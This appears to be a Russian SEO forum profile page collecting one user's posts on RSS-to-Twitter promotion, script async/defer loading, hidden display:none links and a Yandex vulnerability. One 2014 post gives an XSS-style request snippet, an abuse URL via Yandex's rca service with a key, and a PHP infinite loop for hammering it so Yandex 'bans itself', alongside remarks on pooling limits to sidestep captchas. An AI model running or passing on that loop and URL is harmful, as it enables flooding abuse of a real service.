SocFishing

SocFishing
Рейтинг
118
Регистрация
26.09.2013
Должность
null
Интересы
null
null

Тем кто хочет планомерно создавать твит-шум на свои статьи - twitterfeed.com

Скормив системе RSS можно забыть о постоянной пинговке. Можно указать доп метки к статьям, в которых и пихнуть ключики окружения. Рекомендовано создать с разными ключиками несколько трекеров, а так же подключить сайт к feedburner.com взять с него ленту и продублировать на другом аккаунте.

Ко всему прочему можно скормить RSS feedburner в ya.ru, так ваши дела немного улучшаться и нет рисков попасть в бан.

vasilukwolf:

Поточнее, что за тесты, bug тесты, sql тесты ?

По работе что-нибудь, мелочи, разбор документации. Да какая разница. У меня Windows исключительно для дома, всю работу веду на Linux (SSH + FileToonel) на дедике.

Перепост по нестандартному использованию этой баги. Или как отправить Яндекс самоликвидироваться.

Еще раз написал письмо в отдел безопасности.

master_jeday:
Фига се. Как все запущенно у них. :(

Я перепутал. Это первая запись выдачи.

Так что ждем того, кто выполнит зацикленный скрипт. так яндекс должен забанить сам себя. 🤪

Еще раз написал предупреждение в яндекс о данном факте.

бомжнезакон:
а есть разница между

Да, есть. Их параметр отвечает не за загрузку браузером JS-кода метрики, а за загрузку в коде метрики, за счет создания нового JS. ( d.createElement("script"), ). Грубо говоря, у них загрузчик загружается, когда дойдет до него ход загрузки страницы, а потом создает новый JS c async = true. Что и не мешает ему загрузить основной функционал метрики вперед тормозных скриптов.

<script type="text/javascript" async>  
же в свою очередь флаг загрузки скрипта, либо жди очереди - defer, либо стартуй сразу - async.

Рекомендую у метрики выставить s.async = false; и добавить после всех скриптов в footer. ;)

Сочувствую.

Яндекс не спешит закрывать критические уязвимости

Мысль такова, а забанит Яндекс сам себя? Пример для XSS.

Мысль такая, использовать


<script type="text/javascript">
function YandexFackIP(url) {
var xmlhttp;

if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}

xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
document.getElementById("inparse").innerHTML = xmlhttp.responseText;
}
}

xmlhttp.open("GET", url, true);
xmlhttp.send();
}

YandexFackIP("http://yandex.ru/yandsearch?lr=46&text=localhost+ban");
</script>
<div id="inparse"></div>

Логика такова, использую XSS выслать поисковый запрос, полученную страницу отдать в div. Лирика, так что я перейду к рабочему способу Ban localhost Yandex.

Магия такова:

http://rca.yandex.com/?key=24LbkxMc&url=http://yandex.ru/yandsearch?lr=46%26text=localhost+ban

Заходим и радуемся. У кого есть желание выслать в бан яндекса сам яндекс, используем вот так

<?php
while (true) {file_get_contents("http://rca.yandex.com/?key=24LbkxMc&url=http://yandex.ru/yandsearch?lr=46%26text=localhost+ban");}
?>

шах и мат, яндекс...

---------- Добавлено 18.04.2014 в 23:03 ----------

Ура, кто-то этого добился, раньше такого не выводило:

{
"url": "http://yandex.ru/yandsearch?lr=46&text=localhost%20ban",
"confidence": {
"content": "high"
},
"title": "Яндекс",
"mime": "text/html",
"finalurl": "http://yandex.ru/yandsearch?lr=46&text=localhost%20ban",
"content": "14 июля 2010 localhost/bans", на котором и должна открыться титульная страница установки AMXBans, далее вводим свои пароли и значения, которые конфигурировались во 2 пункте...\n4PHP :: Ip Ban Works On Localhost, Not On Www перевод\nIf i add 127.0.0.1 and run this page from a localhost it bans me successfully but as soon as I upload the page it and add my IP to test it, it does not work on the web!"
}

Забавно, яндекс использует AMXBans.

Site: http://www.amxbans.net, http://www.amxmodx.org

Система банов которая распространена для Counter-Strike. Может они там Counter-Strike сервер держат и играют на работе, отдел на отдел. А всех остальных банит по IP за ввод капчи.

jacksparrow,

сегодня тоже заметил, что выдает слова.

Как вариант вижу - сливать лимиты с трастовых сайтов в один и использовать XML по своим задачам. Такие капчи обходить накладно, даже если взять во внимание тенденцию к переменам метода отображения.

Используйте следующую конструкцию


<script type="text/javascript" defer>
// метрика
</script>

<script type="text/javascript" async>
// скрипты которые нужно грузить раньше, годится не для всех скриптов, так как может не соблюдаться порядок загрузки. В стандарных сайтах лучше не использовать.
</script>

Разница между этими двумя атрибутами заключается в том, что defer сохраняет порядок выполнения скриптов, а async - нет. Поэтому, чтобы убыстрить процесс открытия, скрипты добавляют в конец BODY или ставят им атрибуты async или defer. В таком случае страница будет показана до загрузки скрипта.

Все нормально, никакого негатива не замечаю от ссылок вида. Боты по ним ходят, индексируют.

<span style="DISPlay:NoNe;"><a href="" title="">hello world</a></span>

Ничего не блокируют.

$("#fl").trigger('click');

Для примера: http://jsfiddle.net/t3SXh/

По вашему примеру снова пытается раскрыть окно в FullScreen, что вы хотели от этого кода? Человек зашел на сайт, нажал ссылку - открыл FullScreen, дальше что, свернуть FullScreen? или вы хотите автоматом открыть FullScreen при заходе, это нереально, проверял. Безопасность не позволяет сделать это без клика.

Всего: 1070